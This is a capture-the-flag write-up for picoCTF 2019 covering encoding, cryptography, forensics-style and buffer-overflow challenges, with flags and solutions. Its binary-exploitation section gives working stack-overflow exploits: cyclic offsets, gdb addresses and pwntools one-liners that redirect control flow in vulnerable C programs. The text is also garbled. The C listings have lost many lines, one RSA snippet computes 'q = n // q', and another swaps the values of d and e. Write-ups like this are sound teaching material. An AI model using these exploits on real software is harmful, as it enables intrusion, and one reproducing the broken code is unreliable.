Pico CTF 2019
Challenge | Category | Points |
2Warm | General Skills | 50 |
Lets Warm Up | General Skills | 50 |
Warmed Up | General Skills | 50 |
Bases | General Skills | 100 |
First Grep | General Skills | 100 |
Resources | General Skills | 100 |
strings it | General Skills | 100 |
What’s a net cat? | General Skills | 100 |
Based | General Skills | 200 |
OverFlow 0 | Binary Exploitation | 50 |
OverFlow 1 | Binary Exploitation | 150 |
OverFlow 2 | Binary Exploitation | 250 |
NewOverFlow-1 | Binary Exploitation | 200 |
NewOverFlow-2 | Binary Exploitation | 250 |
The Numbers | Cryptography | 50 |
13 | Cryptography | 100 |
Easy1 | Cryptography | 100 |
Caesar | Cryptography | 100 |
Flags | Cryptography | 200 |
Mr-Worldwide | Cryptography | 200 |
Tapping | Cryptography | 200 |
La Cifra De | Cryptography | 200 |
RSA Pop Quiz | Cryptography | 200 |
MiniRSA | Cryptography | 300 |
waves over lambda | Cryptography | 300 |
b00tl3gRSA2 | Cryptography | 400 |
b00tl3gRSA3 | Cryptography | 450 |
john_pollard | Cryptography | 500 |
unzip | Forensics | 50 |
So Meta | Forensics | 150 |
What Lies Within | Forensics | 150 |
extensions | Forensics | 150 |
WhitePages | Forensics | 250 |
m00nwalk | Forensics | 200 |
pastaAAA | Forensics | 300 |
Insp3ct0r | Web | 50 |
dont-use-client-side | Web | 100 |
where are the robots | Web | 100 |
Client-side-again | Web | 200 |
picobrowser | Web | 200 |
Java Script Kiddie | Web | 400 |
Java Script Kiddie 2 | Web | 550 |
General Skills
Points: 50
Can you convert the number 42 (base 10) to binary (base 2)?
>>> "{0:b}".format(42)
Lets Warm Up
Points: 50
If I told you a word started with 0x70 in hexadecimal, what would it start with in ASCII?
Warmed Up
Points: 50
What is 0x3D (base 16) in decimal (base 10).
>>> 0x3D
Points: 100
What does this bDNhcm5fdGgzX3IwcDM1 mean? I think it has something to do with bases.
Decode from base64 to find
echo bDNhcm5fdGgzX3IwcDM1 | base64 --decode
First Grep
Points: 100
Teaching you to use grep to find the flag. Lets find all instances of “pico” in the file
grep -e "pico" file.dms
Points: 100
Go to https://picoctf.com/resources
and grab the flag
picoCTF{r3source_pag3_f1ag} (2019 competition)
strings it
Points: 100
Can you find the flag in file without running it? You can also find the file in /problems/strings-it_3_d2b2eb25dc5e3f3625810131832de295 on the shell server.
strings strings.dms picoCTF{5tRIng5_1T_30be4706}
what’s a net cat?
Points: 100
Using netcat (nc) is going to be pretty important. Can you connect to 2019shell1.picoctf.com at port 12265 to get the flag?
Jack: ~$ nc 2019shell1.picoctf.com 12265
You're on your way to becoming the net cat master
Points: 200
To get truly 1337, you must understand different data encodings, such as hexadecimal or binary. Can you get the flag from this program to prove you are on the way to becoming 1337? Connect with nc 2019shell1.picoctf.com 20836.
Let us see how data is stored
Please give the 01101100 01100001 01101101 01110000 as a word.
you have 45 seconds.....
Please give me the 163 164 162 145 145 164 as a word.
Please give me the 6f76656e as a word.
You've beaten the challenge
Flag: picoCTF{learning_about_converting_values_2360e4dd}
Binary Exploitation
OverFlow 0
Points: 50
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#define FLAGSIZE_MAX 64
char flag[FLAGSIZE_MAX];
void sigsegv_handler(int sig) {
fprintf(stderr, "%s\n", flag);
void vuln(char *input){
char buf[128];
strcpy(buf, input);
int main(int argc, char **argv){
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
signal(SIGSEGV, sigsegv_handler);
gid_t gid = getegid();
setresgid(gid, gid, gid);
if (argc > 1) {
printf("You entered: %s", argv[1]);
printf("Please enter an argument next time\n");
return 0;
./vuln `python -c "print 'A'*1000"`
OverFlow 1
Points: 150
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "asm.h"
#define BUFFSIZE 64
#define FLAGSIZE 64
void flag() {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("Flag File is Missing. please contact an Admin if you are running this on the shell server.\n");
void vuln(){
char buf[BUFFSIZE];
printf("Woah, were jumping to 0x%x !\n", get_return_address());
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Give me a string and lets see what happens: ");
return 0;
Sending a bunch of data to
jack4818@pico-2019-shell1:/problems/overflow-1_1_3039944758e6085624f51d62226d3c13$ python -c "print 'A'*(100)" | ./vuln
Give me a string and lets see what happens:
Woah, were jumping to 0x41414141 !
So we see that we are able to overwrite the return address by sending a very long string. To find the correct offset we use
jack4818@pico-2019-shell1:/problems/overflow-1_1_3039944758e6085624f51d62226d3c13$ cyclic 200 | ./vuln
Give me a string and lets see what happens:
Woah, were jumping to 0x61616174 !
Segmentation fault (core dumped)
jack4818@pico-2019-shell1:/problems/overflow-1_1_3039944758e6085624f51d62226d3c13$ cyclic -l 0x61616174
Now we know the offset, we need the address of the function flag()
jack4818@pico-2019-shell1:/problems/overflow-1_1_3039944758e6085624f51d62226d3c13$ gdb ./vuln
(gdb) info address flag
Symbol "flag" is at 0x80485e6 in a file compiled without debugging.
With the buffer size and the address, we can now call the function
jack4818@pico-2019-shell1:/problems/overflow-1_1_3039944758e6085624f51d62226d3c13$ python -c "from pwn import *; print 'A'*(76)+p32(0x80485e6)" | ./vuln
Give me a string and lets see what happens:
Woah, were jumping to 0x80485e6 !
OverFlow 2
Points: 250
Now try overwriting arguments. Can you get the flag from this program? You can find it in /problems/overflow-2_2_fc3395ae58774b9c251598a8e4bea2e0 on the shell server. Source.
Source code
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 176
#define FLAGSIZE 64
void flag(unsigned int arg1, unsigned int arg2) {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
if (arg1 != 0xDEADBEEF)
if (arg2 != 0xC0DED00D)
void vuln(){
char buf[BUFSIZE];
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Please enter your string: ");
return 0;
The aim is to overflow and send flag(0xDEADBEEF,0xC0DED00D)
Like the last challenge, using gdb we can find the address of flag()
$ gdb ./vuln
(gdb) info address flag
Symbol "flag" is at 0x80485e6 in a file compiled without debugging.
To find the offset, we can run vuln in gdb to get the seg fault when we send in 1000 characters of cyclic
Jack: ~$ cyclic 1000
Program received signal SIGSEGV, Segmentation fault. 0x62616177 in ?? ()
The offset is then found
$ cyclic -l 0x62616177
With the offset, we send the address of flag function: 0x80485e6, followed by 4 bytes to pad the second return address and then include our two arguments: 0xDEADBEEF, 0xC0DED00D
Put togther, we have
$ python -c "from pwn import *; print 'A'*(188)+p32(0x80485e6)+'A'*4+p32(0xDEADBEEF)+p32(0xC0DED00D)" | ./vuln
Points: 200
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFFSIZE 64
#define FLAGSIZE 64
void flag() {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("'flag.txt' missing in the current directory!\n");
void vuln(){
char buf[BUFFSIZE];
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Welcome to 64-bit. Give me a string that gets you the flag: ");
return 0;
Another overflow challenge. This time we’re working with a 64bit machine. To return the function flag()
we will need two things:
- The offset for the return address
- The return address of the function
To calculate the offset, lets grab 1000 characters from cyclic
Jack: ~$ cyclic 1000
We start up gdb. Lets disassemble vuln
and set a breakpoint at the input of our string
disassemble vuln
Dump of assembler code for function vuln:
0x00000000004007cc <+0>: push %rbp
0x00000000004007cd <+1>: mov %rsp,%rbp
0x00000000004007d0 <+4>: sub $0x40,%rsp
0x00000000004007d4 <+8>: lea -0x40(%rbp),%rax
0x00000000004007d8 <+12>: mov %rax,%rdi
0x00000000004007db <+15>: mov $0x0,%eax
0x00000000004007e0 <+20>: callq 0x400630 <gets@plt>
0x00000000004007e5 <+25>: nop
0x00000000004007e6 <+26>: leaveq
0x00000000004007e7 <+27>: retq
End of assembler dump.
break * vuln+20
Breakpoint 1 at 0x4007e0
We identify the addresses of rsp and rbp.
(gdb) x $rsp
0x7ffd5ab97a30: 0x0000003c
(gdb) x $rbp
0x7ffd5ab97a70: 0x5ab97aa0
will help us find the int from cyclic to identify. Lets dump 120 hexadecimal addresses from the address of rsp
(gdb) x/120x $rsp
0x7ffd5ab97a30: 0x61616161 0x61616162 0x61616163 0x61616164
0x7ffd5ab97a40: 0x61616165 0x61616166 0x61616167 0x61616168
0x7ffd5ab97a50: 0x61616169 0x6161616a 0x6161616b 0x6161616c
0x7ffd5ab97a60: 0x6161616d 0x6161616e 0x6161616f 0x61616170
0x7ffd5ab97a70: 0x61616171 0x61616172 0x61616173 0x61616174
0x7ffd5ab97a80: 0x61616175 0x61616176 0x61616177 0x61616178
0x7ffd5ab97a90: 0x61616179 0x6261617a 0x62616162 0x62616163
0x7ffd5ab97aa0: 0x62616164 0x62616165 0x62616166 0x62616167
0x7ffd5ab97ab0: 0x62616168 0x62616169 0x6261616a 0x6261616b
0x7ffd5ab97ac0: 0x6261616c 0x6261616d 0x6261616e 0x6261616f
0x7ffd5ab97ad0: 0x62616170 0x62616171 0x62616172 0x62616173
0x7ffd5ab97ae0: 0x62616174 0x62616175 0x62616176 0x62616177
0x7ffd5ab97af0: 0x62616178 0x62616179 0x6361617a 0x63616162
0x7ffd5ab97b00: 0x63616163 0x63616164 0x63616165 0x63616166
0x7ffd5ab97b10: 0x63616167 0x63616168 0x63616169 0x6361616a
0x7ffd5ab97b20: 0x6361616b 0x6361616c 0x6361616d 0x6361616e
0x7ffd5ab97b30: 0x6361616f 0x63616170 0x63616171 0x63616172
0x7ffd5ab97b40: 0x63616173 0x63616174 0x63616175 0x63616176
0x7ffd5ab97b50: 0x63616177 0x63616178 0x63616179 0x6461617a
0x7ffd5ab97b60: 0x64616162 0x64616163 0x64616164 0x64616165
0x7ffd5ab97b70: 0x64616166 0x64616167 0x64616168 0x64616169
0x7ffd5ab97b80: 0x6461616a 0x6461616b 0x6461616c 0x6461616d
0x7ffd5ab97b90: 0x6461616e 0x6461616f 0x64616170 0x64616171
0x7ffd5ab97ba0: 0x64616172 0x64616173 0x64616174 0x64616175
0x7ffd5ab97bb0: 0x64616176 0x64616177 0x64616178 0x64616179
0x7ffd5ab97bc0: 0x6561617a 0x65616162 0x65616163 0x65616164
0x7ffd5ab97bd0: 0x65616165 0x65616166 0x65616167 0x65616168
0x7ffd5ab97be0: 0x65616169 0x6561616a 0x6561616b 0x6561616c
0x7ffd5ab97bf0: 0x6561616d 0x6561616e 0x6561616f 0x65616170
0x7ffd5ab97c00: 0x65616171 0x65616172 0x65616173 0x65616174
Now we can calculate the offset
Jack: ~$ cyclic -l 0x61616173
Function address
(gdb) info address flag
Symbol "flag" is at 0x400767 in a file compiled without debugging.
There is some alignment issue, and the correct address is 0x400767
. Apparently this is to do with Ubuntu 18.04. I don’t know.
As we know the offset and the function address, we can use overflow to point to the function flag and print out the flag
python -c "from pwn import *; print 'A'*(72)+p64(0x400768)" | ./vuln
Points: 250
So while reading the source of this challenge
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdbool.h>
#define BUFFSIZE 64
#define FLAGSIZE 64
bool win1 = false;
bool win2 = false;
void win_fn1(unsigned int arg_check) {
if (arg_check == 0xDEADBEEF) {
win1 = true;
void win_fn2(unsigned int arg_check1, unsigned int arg_check2, unsigned int arg_check3) {
if (win1 && \
arg_check1 == 0xBAADCAFE && \
arg_check2 == 0xCAFEBABE && \
arg_check3 == 0xABADBABE) {
win2 = true;
void win_fn() {
char flag[48];
FILE *file;
file = fopen("flag.txt", "r");
if (file == NULL) {
printf("'flag.txt' missing in the current directory!\n");
fgets(flag, sizeof(flag), file);
if (win1 && win2) {
printf("%s", flag);
else {
printf("Nope, not quite...\n");
void flag() {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("'flag.txt' missing in the current directory!\n");
void vuln(){
char buf[BUFFSIZE];
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Welcome to 64-bit. Can you match these numbers?");
return 0;
I noticed an error in the challenge. The flag is loaded into win_fn()
which is the intended solution, but it’s also loaded into the function flag()
void flag() {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("'flag.txt' missing in the current directory!\n");
Unlike win_fn()
this has no logical arguments and we can simply call it, exactly like the previous challenge…
The offset was found to be 72
, and gdb points to the flag function
(gdb) info address flag
Symbol "flag" is at 0x40084d in a file compiled without debugging.
So we can simply collect the flag, after fixing the flag pointer, and win the challenge.
python -c "from pwn import *; print 'A'*(72)+p64(0x40084e)" | ./vuln
Welcome to 64-bit. Can you match these numbers?
Segmentation fault (core dumped)
The Numbers
Points: 50
The numbers… what do they mean?
File contains
16 9 3 15 3 20 6 20 8 5 14 21 13 2 5 18 19 13 1 19 15 14
Converting the numbers to letters using: a-z = 1-26:
Points: 100
ROT13 on the file:
Points: 100
We are given the cipher UFJKXQZQUNB
and the key SOLVECRYPTO
. The table given is the Vigenere table, using it we obtain the flag
Points: 100
Trial and error through to find that rot7 is the correct decryption.
Points: 200
The flag is encoded using Nautical Flags
Points: 200
picoCTF{(35.028309, 135.753082)(46.469391, 30.740883)(39.758949, -84.191605)(41.015137, 28.979530)(24.466667, 54.366669)(3.140853, 101.693207)_(9.005401, 38.763611)(-3.989038, -79.203560)(52.377956, 4.897070)(41.085651, -73.858467)(57.790001, -152.407227)(31.205753, 29.924526)}
Each pair of numbers are coordinates. The coordinates give the following cities
Taking the first letter of each of the cities gives the flag
Points: 200
Theres tapping coming in from the wires. What’s it saying nc 2019shell1.picoctf.com 45617.
Connecting to the port we recieve
.--. .. -.-. --- -.-. - ..-. { -- ----- .-. ... ...-- -.-. ----- -.. ...-- .---- ... ..-. ..- -. ...-- ..... ..--- ....- ----. ....- -.... ....- --... .---- }
Decoding as morse gives the flag
La Cifra De
Points 200
nc 2019shell2.picoctf.com 60147
Ne iy nytkwpsznyg nth it mtsztcy vjzprj zfzjy rkhpibj nrkitt ltc tnnygy ysee itd tte cxjltk
Ifrosr tnj noawde uk siyyzre, yse Bnretèwp Cousex mls hjpn xjtnbjytki xatd eisjd
Iz bls lfwskqj azycihzeej yz Brftsk ip Volpnèxj ls oy hay tcimnyarqj dkxnrogpd os 1553 my Mnzvgs Mazytszf Merqlsu ny hox moup Wa inqrg ipl. Ynr. Gotgat Gltzndtg Gplrfdo
Ltc tnj tmvqpmkseaznzn uk ehox nivmpr g ylbrj ts ltcmki my yqtdosr tnj wocjc hgqq ol fy oxitngwj arusahje fuw ln guaaxjytrd catizm tzxbkw zf vqlckx hizm ceyupcz yz tnj fpvjc hgqqpohzCZK{m311a50_0x_a1rn3x3_h1ah3x8j3m3a15}
Zmp fowdt cjwl-jtnusjytki oeyhcivytot tq a vtwygqahggptoh nivmpr nthebjc, wgx xajj lruzyd 1467 hd Weus Mazytszf Llhjcto.
Yse Bnretèwp Cousex nd tnjceltce ytxeznxey hllrjo tnj Llhjcto Itsi tc Argprzn Nivmpr.
Os 1508, Uonfynkx Eroysesnfs osgetypd zmp su-hllrjo tggflg wpczf (l mgycid tq snnqtki llvmlbkyd) tnfe wuzwd rfeex gp a iwttohll itxpuspnz tq tnj Gimjyèrk Htpnjc.
Bkqwayt’d skhznj gzoqqpt guaegwpd os 1555 ls g hznznyugytot tq tnj qixxe. Tnj wocjc hgqgey tq tnj llvmlbkyd axj yoc xsilypd xjrurfcle, gft zmp arusahjes gso tnj tnjji lkyeexx lrk rtxki my sjlny tq a sspmustc qjj pnwlsk, bsiim nat gp dokqexjyt cneh kfnh itcrkxaotipnz.
Which we can decode using Vigenere, with the key “flag”
It is interesting how in history people often receive credit for things they did not create
During the course of history, the Vigenère Cipher has been reinvented many times
It was falsely attributed to Blaise de Vigenère as it was originally described in 1553 by Giovan Battista Bellaso in his book La cifra del. Sig. Giovan Battista Bellaso
For the implementation of this cipher a table is formed by sliding the lower half of an ordinary alphabet for an apparently random number of places with respect to the upper halfpicoCTF{b311a50_0r_v1gn3r3_c1ph3r8e3b3a15}
The first well-documented description of a polyalphabetic cipher however, was made around 1467 by Leon Battista Alberti.
The Vigenère Cipher is therefore sometimes called the Alberti Disc or Alberti Cipher.
In 1508, Johannes Trithemius invented the so-called tabula recta (a matrix of shifted alphabets) that would later be a critical component of the Vigenère Cipher.
Bellaso’s second booklet appeared in 1555 as a continuation of the first. The lower halves of the alphabets are now shifted regularly, but the alphabets and the index letters are mixed by means of a mnemonic key phrase, which can be different with each correspondent.
RSA Pop Quiz
Points: 200
Class, take your seats! It’s PRIME-time for a quiz…
nc 2019shell1.picoctf.com 49989
Good morning class! It’s me Ms. Adleman-Shamir-Rivest Today we will be taking a pop quiz, so I hope you studied. Cramming just will not do! You will need to tell me if each example is possible, given your extensive crypto knowledge. Inputs and outputs are in decimal. No hex here!
Question 1
Here we are asked to calculate the modulus n
, given p,q
. As n = pq
this is feasible and we find that
n = pq = 60413 \times 76753 = 4636878989
Using python
p = 60413
q = 76753
n = p*q
Question 2
Here we are asked to find the prime q
, given the modulus n
and prime p
. This is feasible as we can recover q from division.
q = \frac{n}{p} = \frac{5051846941}{54269} = 93089
Using python
p = 54269
n = 5051846941
q = n//p
Question 3
NEW PROBLEM e : 3 n : 12738162802910546503821920886905393316386362759567480839428456525224226445173031635306683726182522494910808518920409019414034814409330094245825749680913204566832337704700165993198897029795786969124232138869784626202501366135975223827287812326250577148625360887698930625504334325804587329905617936581116392784684334664204309771430814449606147221349888320403451637882447709796221706470239625292297988766493746209684880843111138170600039888112404411310974758532603998608057008811836384597579147244737606088756299939654265086899096359070667266167754944587948695842171915048619846282873769413489072243477764350071787327913 PRODUCE THE FOLLOWING q p IS THIS POSSIBLE and FEASIBLE? (Y/N):
Here we are given the public key (n,e)
. Although e
is small, and potentially the RSA encryption may be weak to an attack, we cannot factor n
in a reasonable time and so this is not feasible.
Question 4
Here we are asked to calculate the totient of n
given two primes p,q
. This is feasible. We use the standard realtion:
\phi(n) = (p-1)(q-1) = 836623060
Using python
p = 12611
q = 66347
phi = (p-1)*(q-1)
Question 5
NEW PROBLEM plaintext : 6357294171489311547190987615544575133581967886499484091352661406414044440475205342882841236357665973431462491355089413710392273380203038793241564304774271529108729717 e : 3 n : 29129463609326322559521123136222078780585451208149138547799121083622333250646678767769126248182207478527881025116332742616201890576280859777513414460842754045651093593251726785499360828237897586278068419875517543013545369871704159718105354690802726645710699029936754265654381929650494383622583174075805797766685192325859982797796060391271817578087472948205626257717479858369754502615173773514087437504532994142632207906501079835037052797306690891600559321673928943158514646572885986881016569647357891598545880304236145548059520898133142087545369179876065657214225826997676844000054327141666320553082128424707948750331 #PRODUCE THE FOLLOWING ciphertext IS THIS POSSIBLE and FEASIBLE? (Y/N):
We are now being asked to encrypt the message m
to produce the ciphertext c
. As we are given both the modulus m
and the exponent e
, we can perform the encryption in the standard way and so this is feasible.
c = m^e \mod n
Using python
m = 6357294171489311547190987615544575133581967886499484091352661406414044440475205342882841236357665973431462491355089413710392273380203038793241564304774271529108729717
n = 29129463609326322559521123136222078780585451208149138547799121083622333250646678767769126248182207478527881025116332742616201890576280859777513414460842754045651093593251726785499360828237897586278068419875517543013545369871704159718105354690802726645710699029936754265654381929650494383622583174075805797766685192325859982797796060391271817578087472948205626257717479858369754502615173773514087437504532994142632207906501079835037052797306690891600559321673928943158514646572885986881016569647357891598545880304236145548059520898133142087545369179876065657214225826997676844000054327141666320553082128424707948750331
e = 3
c = pow(m,e,n)
Question 6
NEW PROBLEM ciphertext : 107524013451079348539944510756143604203925717262185033799328445011792760545528944993719783392542163428637172323512252624567111110666168664743115203791510985709942366609626436995887781674651272233566303814979677507101168587739375699009734588985482369702634499544891509228440194615376339573685285125730286623323 e : 3 n : 27566996291508213932419371385141522859343226560050921196294761870500846140132385080994630946107675330189606021165260590147068785820203600882092467797813519434652632126061353583124063944373336654246386074125394368479677295167494332556053947231141336142392086767742035970752738056297057898704112912616565299451359791548536846025854378347423520104947907334451056339439706623069503088916316369813499705073573777577169392401411708920615574908593784282546154486446779246790294398198854547069593987224578333683144886242572837465834139561122101527973799583927411936200068176539747586449939559180772690007261562703222558103359 PRODUCE THE FOLLOWING plaintext IS THIS POSSIBLE and FEASIBLE? (Y/N)
Here we are asked to decrypt a message but we are only given the public key (n,e)
. Therefore it is not feasible to find the plaintext m
Question 7
NEW PROBLEM q : 92092076805892533739724722602668675840671093008520241548191914215399824020372076186460768206814914423802230398410980218741906960527104568970225804374404612617736579286959865287226538692911376507934256844456333236362669879347073756238894784951597211105734179388300051579994253565459304743059533646753003894559 p : 97846775312392801037224396977012615848433199640105786119757047098757998273009741128821931277074555731813289423891389911801250326299324018557072727051765547115514791337578758859803890173153277252326496062476389498019821358465433398338364421624871010292162533041884897182597065662521825095949253625730631876637 e : 65537 PRODUCE THE FOLLOWING d IS THIS POSSIBLE and FEASIBLE? (Y/N)
We are now asked to find the modular multiplicative inverse d
given the two primes p,q
and e
. This is feasible as using p,q
we can caluclate \phi(n)
and using (\phi(n),e
) we can find d
Using python
from Crypto.Util.number import inverse
p = 97846775312392801037224396977012615848433199640105786119757047098757998273009741128821931277074555731813289423891389911801250326299324018557072727051765547115514791337578758859803890173153277252326496062476389498019821358465433398338364421624871010292162533041884897182597065662521825095949253625730631876637
q = 92092076805892533739724722602668675840671093008520241548191914215399824020372076186460768206814914423802230398410980218741906960527104568970225804374404612617736579286959865287226538692911376507934256844456333236362669879347073756238894784951597211105734179388300051579994253565459304743059533646753003894559
phi = (p-1)*(q-1)
d = inverse(e,phi)
Question 8
NEW PROBLEM p : 153143042272527868798412612417204434156935146874282990942386694020462861918068684561281763577034706600608387699148071015194725533394126069826857182428660427818277378724977554365910231524827258160904493774748749088477328204812171935987088715261127321911849092207070653272176072509933245978935455542420691737433 ciphertext : 9200910993991342245635775242884295171331638486293398612829324409189786924964269448402231033692571666846582772547678361933884560304465448930040982507936200701552729919507681097344114739434382503801935689147981369024180959865358948150771814009412646368907358482273874756410640420832989566791308787895283057047604985049071797817308263226498433025719101414595141020534960745847160087741791305232083441121028428567136619357775442961508547402267425797890689191622526865196136020253867164299721963231711821169972573934532328410089925473599566951143246364545922038720537045119212022769806144414268754234300461988702406805390 e : 65537 n : 23952937352643527451379227516428377705004894508566304313177880191662177061878993798938496818120987817049538365206671401938265663712351239785237507341311858383628932183083145614696585411921662992078376103990806989257289472590902167457302888198293135333083734504191910953238278860923153746261500759411620299864395158783509535039259714359526738924736952759753503357614939203434092075676169179112452620687731670534906069845965633455748606649062394293289967059348143206600765820021392608270528856238306849191113241355842396325210132358046616312901337987464473799040762271876389031455051640937681745409057246190498795697239 #PRODUCE THE FOLLOWING plaintext IS THIS POSSIBLE and FEASIBLE? (Y/N)
Here we are given a ciphertext c
to decode. As we are given (n,p)
we can find q
. As we are given p,q,e
we can find d
. As we have c,d,n
we can find the plaintext m
and so this is feasible.
from Crypto.Util.number import inverse
c = 9200910993991342245635775242884295171331638486293398612829324409189786924964269448402231033692571666846582772547678361933884560304465448930040982507936200701552729919507681097344114739434382503801935689147981369024180959865358948150771814009412646368907358482273874756410640420832989566791308787895283057047604985049071797817308263226498433025719101414595141020534960745847160087741791305232083441121028428567136619357775442961508547402267425797890689191622526865196136020253867164299721963231711821169972573934532328410089925473599566951143246364545922038720537045119212022769806144414268754234300461988702406805390
n = 23952937352643527451379227516428377705004894508566304313177880191662177061878993798938496818120987817049538365206671401938265663712351239785237507341311858383628932183083145614696585411921662992078376103990806989257289472590902167457302888198293135333083734504191910953238278860923153746261500759411620299864395158783509535039259714359526738924736952759753503357614939203434092075676169179112452620687731670534906069845965633455748606649062394293289967059348143206600765820021392608270528856238306849191113241355842396325210132358046616312901337987464473799040762271876389031455051640937681745409057246190498795697239
e = 65537
p = 153143042272527868798412612417204434156935146874282990942386694020462861918068684561281763577034706600608387699148071015194725533394126069826857182428660427818277378724977554365910231524827258160904493774748749088477328204812171935987088715261127321911849092207070653272176072509933245978935455542420691737433
q = n // q
phi = (p-1)*(q-1)
d = inverse(e,phi)
m = pow(c,d,n)
Question 9
If you convert the last plaintext to a hex number, then ascii, you’ll find what you need! ;)
Given the integer from the plaintext, we convert the integer into base 16 and then decode the resulting string as ascii text
m = 14311663942709674867122208214901970650496788151239520971623411712977119737614436391696347773
x = (bytes.fromhex(format(m,'x'))).decode('utf-8')
Points: 300
This RSA challenge is solved by noticing that n
is a very large integer, while the cipher text is relatively small and the exponent is e=3
. If the plaintext is unpadded, there’s a good change we can recover the message by taking the cube root of c
I used mathematica for this because I’m lazy, but there are tutorials online for accurate calculations of cube roots.
c = 2205316413931134031074603746928247799030155221252519872650090188613452564237125578465730267259964004717502122380246206889902726277183873277327660628860571110294829824875203511275589025377840116767106200804425285036496482998467992009084773
m = c^{1/3}
Heading over to python we can print the flag out
x = (bytes.fromhex(format(m,'x')))
waves over lambda
Points: 300
We are given the following ciphertext
flgiyorv utyt av mljy xdoi - xytwjtgfm_av_f_lnty_dopezo_nrfyxnnovl
odtqtm xmlzlylnarfu coyopohln kov rut ruayz vlg lx xmlzly bondlnarfu coyopohln, o dogz lkgty ktdd cglkg ag ljy zavryafr ag uav lkg zom, ogz vradd ytptpetytz oplgi jv lkagi rl uav idllpm ogz ryoiaf ztoru, kuafu uobbtgtz ruayrttg mtoyv oil, ogz kuafu a vuodd ztvfyaet ag arv bylbty bdoft. xly rut bytvtgr a kadd lgdm vom ruor ruav dogzlkgtyxly vl kt jvtz rl fodd uap, odruljiu ut uoyzdm vbtgr o zom lx uav daxt lg uav lkg tvrortkov o vryogit rmbt, mtr lgt bytrrm xytwjtgrdm rl et ptr karu, o rmbt oestfr ogz nafaljv ogz or rut vopt rapt vtgvtdtvv. ejr ut kov lgt lx rulvt vtgvtdtvv btyvlgv kul oyt ntym ktdd foboedt lx dllcagi oxrty rutay klydzdm oxxoayv, ogz, obboytgrdm, oxrty glruagi tdvt. xmlzly bondlnarfu, xly agvrogft, etiog karu gtqr rl glruagi; uav tvrort kov lx rut vpoddtvr; ut yog rl zagt or lruty ptg'v roedtv, ogz xovrtgtz lg rutp ov o rlozm, mtr or uav ztoru ar obbtoytz ruor ut uoz o ujgzytz ruljvogz yljedtv ag uoyz fovu. or rut vopt rapt, ut kov odd uav daxt lgt lx rut plvr vtgvtdtvv, xogrovrafod xtddlkv ag rut kuldt zavryafr. a ytbtor, ar kov glr vrjbazarmrut poslyarm lx rutvt xogrovrafod xtddlkv oyt vuytkz ogz agrtddaitgr tgljiuejr sjvr vtgvtdtvvgtvv, ogz o btfjdaoy goralgod xlyp lx ar.
We simply run this through Quipqiup. The whole thing can be solved if we include the fact that
flgiyorv utyt av mljy xdoi - xytwjtgfm_av_f_lnty_dopezo = congrats here is your flag - frequency_is_c_over_lambda
Whole message
congrats here is your flag - frequency_is_c_over_lambda_vtcrfvvaso
ale?ey fyodorovitch ?arama?ov was the third son of fyodor pavlovitch ?arama?ov, a land owner well ?nown in our district in his own day, and still remembered among us owing to his gloomy and tragic death, which happened thirteen years ago, and which i shall describe in its proper place. for the present i will only say that this landownerfor so we used to call him, although he hardly spent a day of his life on his own estatewas a strange type, yet one pretty frequently to be met with, a type ab?ect and vicious and at the same time senseless. but he was one of those senseless persons who are very well capable of loo?ing after their worldly affairs, and, apparently, after nothing else. fyodor pavlovitch, for instance, began with ne?t to nothing; his estate was of the smallest; he ran to dine at other men’s tables, and fastened on them as a toady, yet at his death it appeared that he had a hundred thousand roubles in hard cash. at the same time, he was all his life one of the most senseless, fantastical fellows in the whole district. i repeat, it was not stupiditythe ma?ority of these fantastical fellows are shrewd and intelligent enoughbut ?ust senselessness, and a peculiar national form of it.
Points: 400
from Crypto.Util.number import inverse
c = 56655071811218224302828848384519761929289839550855972427206791329461775512270676034900409928292898003845734257623136840362218584497862865087461886207069787597998446055905343532681334059721570425129696993455754319242507507674580943623854203561027603379347296171186617627184609486456236613031591207061561272676
n = 96636736570006391860399135193259732242595830552235523260510184668822655545791163241131054447802725748664426942000825437273461145584615972378451691053658609612366871910701324807748704651074817206221988255491891215446330838210841688047206350113325714155872264893985927297410857408238972581432853154511703458633
d = 65537
e = 2229500063992090948516463866399266294624485341028428386558606576731615044711174433077347976335165194195349398603922182296374158904495771094743716631416326465247179896288728731731743749544188582814097137843422447642427165304689108521723489356048403573469866596455857380956843922925692792779549591136186267041
def get_RSA_flag(c,n,d):
m = pow(c,d,n)
return bytes.fromhex(format(m,'x'))
Points: 450
from Crypto.Util.number import inverse
from functools import reduce
c = 32785287387291578099923635290567397410890995803165406332608626598853945807914414181493453637294623115826646562281645665578709210105299157632411423778216770019720138538795448041254766028454614540363936453124864182099849535264994127650408849641519946717113935340974782725913487563495839861003299413348283870125175211815526729778176684395863316322
n = 60681440696288151202766581746354942086205677757405573958398717055255341502335281742341920650344262358338433249212745194346281177671599825637699559577854444053241983437238464141112534065923487024960855855636711574040123082298738257833957092014476942190859115415267888599216201747328865168746986327311224996067215723466592014296734971352912153559
e = 65537
